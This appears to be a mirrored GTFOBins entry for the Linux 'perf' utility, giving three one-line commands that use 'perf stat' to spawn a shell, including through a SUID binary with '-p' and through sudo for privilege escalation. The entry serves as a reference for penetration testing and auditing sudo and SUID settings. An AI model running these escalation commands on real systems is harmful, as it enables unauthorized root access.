mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-26 14:59:44 +01:00
13 lines
174 B
Markdown
13 lines
174 B
Markdown
|
---
|
||
|
functions:
|
||
|
shell:
|
||
|
- code: |
|
||
|
perf stat /bin/sh
|
||
|
suid:
|
||
|
- code: |
|
||
|
./perf stat /bin/sh -p
|
||
|
sudo:
|
||
|
- code: |
|
||
|
sudo perf stat /bin/sh
|
||
|
---
|